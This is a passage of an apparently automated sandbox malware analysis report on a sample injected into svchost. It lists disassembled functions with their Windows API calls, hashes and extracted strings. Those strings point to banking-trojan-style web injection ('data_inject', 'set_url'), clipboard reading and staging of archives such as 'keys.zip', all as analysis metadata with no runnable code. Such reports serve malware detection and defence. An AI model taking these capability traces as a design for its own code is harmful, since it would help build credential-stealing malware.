                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 02CB298B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02CB29BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,00000000), ref: 02CB29CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 02CB2A10
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,?,00000000), ref: 02CB2A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02CB2A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: A23C4505$\$path.txt$rfk.zip
                                                                                                                                                                                                              • API String ID: 3351314726-2217154621
                                                                                                                                                                                                              • Opcode ID: 21a1f82f9a2797024272d9143d577de452aaf4e979ad6f107eeeaee84430c23c
                                                                                                                                                                                                              • Instruction ID: 6ac170cc4135507eabfcea537bd478b8150f6657d3cbefd9a0c8332fccf4a53b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21a1f82f9a2797024272d9143d577de452aaf4e979ad6f107eeeaee84430c23c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85614A309402595FEB22CB349C58BFB7BE5EF86300F444694E9CAD7241DF719A48CB91
                                                                                                                                                                                                              Function 02CA1320 Relevance: 31.8, APIs: 16, Strings: 5, Instructions: 275memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB20,00000000,00000000,00000000,?,02CA1A39), ref: 02CA1330
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,?,02CA1A39), ref: 02CA1398
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02CA1A39), ref: 02CA139F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA141F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA1439
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA1453
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA146D
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA1497
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020), ref: 02CA14B4
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA14BB
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA15E4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA161C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA161F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA162C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA162F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB20,?,02CA1A39), ref: 02CA163A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                              • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                              • API String ID: 2387113551-2328515424
                                                                                                                                                                                                              • Opcode ID: a96c559e689e99b5ccf3e0aa648dfcec692594ddf2f0cd1ec9744256355ceb3f
                                                                                                                                                                                                              • Instruction ID: 39fc0abfd944bdde367f4f3f648a760df3e40da01be98c267e4c7c60ae3c7f0a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a96c559e689e99b5ccf3e0aa648dfcec692594ddf2f0cd1ec9744256355ceb3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FA1D7749453429FDB21CF38C4687667FE5AF85348F1886ADD88BCB601EBB1D605CB90
                                                                                                                                                                                                              Function 02C9E000 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 211synchronizationwindowtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: GetDesktopWindow.USER32 ref: 02C9DF8E
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: RealChildWindowFromPoint.USER32(00000000,?,02C9E016,?,02C9A857,?,74DF30D0,?), ref: 02C9DF95
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: IsWindowVisible.USER32(00000000), ref: 02C9DFC1
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: GetParent.USER32(00000000), ref: 02C9DFC8
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: GetWindowLongA.USER32(00000000,000000EC), ref: 02C9DFD3
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: WindowFromPoint.USER32(74DF30D0,?,?,02C9E016,?,02C9A857,?,74DF30D0,?), ref: 02C9DFE8
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(00000000,?,02C9A857,?,02C9A857,?,74DF30D0,?), ref: 02C9E037
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02C9A857,00000002,00000064,?), ref: 02C9E05D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9E081
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9E092
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C9E09D
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9E0BB
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C9E0C6
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C9A857), ref: 02C9E0D2
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002), ref: 02C9E0E6
                                                                                                                                                                                                              • GetWindowInfo.USER32(?,?), ref: 02C9E129
                                                                                                                                                                                                              • PtInRect.USER32(?,?,02C9A857), ref: 02C9E154
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9E174
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02C9A857,00000002,00000064,000000FF), ref: 02C9E1A3
                                                                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,00000000,00000001), ref: 02C9E1D0
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(?,00000000,?), ref: 02C9E1DB
                                                                                                                                                                                                              • MapWindowPoints.USER32(?,00000000,00000000,00000001), ref: 02C9E1F7
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(00000000,00000000,?), ref: 02C9E202
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$FromPoint$ChildReal$MessagePointsSendTimeout$AncestorDesktopInfoMutexObjectParentRectReleaseSingleVisibleWait
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 1846550538-4251816714
                                                                                                                                                                                                              • Opcode ID: 0b261988fa970025dfdbebc6f311c21e430b0b1c8b90f6f1e2554614cfbf835d
                                                                                                                                                                                                              • Instruction ID: d8a30b10a5828e07acfb628caabc81c98042b2e40525e509e02be0a066bd7b13
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b261988fa970025dfdbebc6f311c21e430b0b1c8b90f6f1e2554614cfbf835d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD61AE75A41215ABDF20DE58DD88FBE73A9EB84721F10460AFD11E7280DB70ED11CBA1
                                                                                                                                                                                                              Function 02CB38F0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 189memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED098), ref: 02CB3920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB3961
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB396B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB3973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB3984
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB398B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02CB39BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CB39CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CB3A10
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02CB3A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02CB3A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: \$path.txt$stf.zip
                                                                                                                                                                                                              • API String ID: 3351314726-487659054
                                                                                                                                                                                                              • Opcode ID: 2db8910f169986914cf3914f609b0f3848d8db793e1a4b2ce0b7e1a3a801c41d
                                                                                                                                                                                                              • Instruction ID: fad6f3d6fa8bf80df4f8fda3a2d4516f60c071e56551c9b7058af95ce875a445
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2db8910f169986914cf3914f609b0f3848d8db793e1a4b2ce0b7e1a3a801c41d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 236138709412995FDB22CB349C98BEB7BE8AF86300F5446D4E9CAD7240DB719A48CB90
                                                                                                                                                                                                              Function 02CAB1D0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 189memoryfilestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAB1F0
                                                                                                                                                                                                                • Part of subcall function 02CAB110: PathAddBackslashA.SHLWAPI(A23C419D), ref: 02CAB137
                                                                                                                                                                                                                • Part of subcall function 02CAB110: GetFileAttributesA.KERNEL32(?), ref: 02CAB175
                                                                                                                                                                                                                • Part of subcall function 02CAB110: PathFileExistsA.SHLWAPI(?), ref: 02CAB1B9
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D), ref: 02CAB238
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CAB2A0
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAB2AD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D,?,?), ref: 02CAB2E7
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CAB36A
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02CAB37E
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02CAB391
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 02CAB3C0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D), ref: 02CAB3CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAB3EE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CAB3F1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAB3FE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CAB401
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID: 5NT$A23C419D$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 2685098104-2049434377
                                                                                                                                                                                                              • Opcode ID: 4a2ecdef4afa12b9ad80b770660218a45ee4dead3fbaa7dedbe7d3d12063d3be
                                                                                                                                                                                                              • Instruction ID: 9825ec4e6ba2b2c2ccee88fbb8308bf7e21f1cb25a525b75cc17969e2fe91583
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a2ecdef4afa12b9ad80b770660218a45ee4dead3fbaa7dedbe7d3d12063d3be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2518D3094134A5FDF118B349CA8BEA7FE8AF96348F044695E989D7241DB719948C790
                                                                                                                                                                                                              Function 02CB8890 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileType.KERNEL32(?,00000000,00000000), ref: 02CB8899
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 02CB88B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleInformationType
                                                                                                                                                                                                              • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                              • API String ID: 4064226416-1748840775
                                                                                                                                                                                                              • Opcode ID: a647ad1eb05743cb1cae988e3f8974116f9ff6b8c5bed36eaf87452cd538b7df
                                                                                                                                                                                                              • Instruction ID: 1ff4a27c330f12455c58106fc2e456454b5b5e2cda874a52e0c8bf08ed55d182
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a647ad1eb05743cb1cae988e3f8974116f9ff6b8c5bed36eaf87452cd538b7df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09518F71D40219ABDB15CFA4DC88BFEBB78FF89700F544629EA05EB180D7749A40CB91
                                                                                                                                                                                                              Function 02CA317E Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 297memorythreadclipboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 02CA325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02CA327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 02CA3286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 02CA329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 02CA32AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02CA32D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02CA32FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA3301
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA3311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02CA332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 02CA3399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,00000000,00000001), ref: 02CA33DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3472172748-4108050209
                                                                                                                                                                                                              • Opcode ID: a9d95cb0404756c344e34e1fe321dee72ea557fea063d1da715e97fea22e0eb0
                                                                                                                                                                                                              • Instruction ID: 98589d2e85e62b290fd915de4d405338bc9e772e01d5465e77cf50b901085410
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9d95cb0404756c344e34e1fe321dee72ea557fea063d1da715e97fea22e0eb0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9241053160A352AFD7209F64DC6DF6B7BA8EFC5749F000B48F949D7280DB60D60586A1
                                                                                                                                                                                                              Function 00401150 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 133memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004,00000000,?,00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401285
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Handle$AllocCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID: G,@
                                                                                                                                                                                                              • API String ID: 132362422-3313068137
                                                                                                                                                                                                              • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                              Function 02CB06C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 116memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(?,?,00000000,00000000,75B07390,?,02C9148C,00000000,?), ref: 02CB06FA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,02C9148C,00000000,?), ref: 02CB0719
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02CB0720
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB0738
                                                                                                                                                                                                              • SetFilePointer.KERNEL32 ref: 02CB0753
                                                                                                                                                                                                              • LockFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 02CB0764
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 02CB0774
                                                                                                                                                                                                              • UnlockFile.KERNEL32(?,?,00000000,?,00000000), ref: 02CB0789
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,BEGIN SIGNATURE), ref: 02CB07A2
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,END SIGNATURE), ref: 02CB07AE
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,75B07390,?,02C9148C,00000000,?), ref: 02CB07CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9148C,00000000,?), ref: 02CB07DE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02CB07E1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9148C,00000000,?), ref: 02CB07EE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02CB07F1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Pointer$AllocFreeLockReadSizeUnlockValidatememset
                                                                                                                                                                                                              • String ID: BEGIN SIGNATURE$END SIGNATURE
                                                                                                                                                                                                              • API String ID: 373673121-4158457813
                                                                                                                                                                                                              • Opcode ID: bd2cc7b95a5502cae24933e111f86627ac6cea82ba904fdaba79d401141b00ab
                                                                                                                                                                                                              • Instruction ID: f92aa380894622c20966b4fde964dc067f642411fa680d0e4fa77920588cfd96
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd2cc7b95a5502cae24933e111f86627ac6cea82ba904fdaba79d401141b00ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8631AE71A42300AFE7219F689C49F6FBBACEF88B44F400B19F544E6180D770D905CBA5
                                                                                                                                                                                                              Function 02CAC6F0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 111sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CAC717
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAC765
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAC771
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAC775
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAC786
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAC78D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CAC7C0
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAC7CF
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAC7D5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAC7D9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAC7EA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAC7F1
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CAC81F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CAC835
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
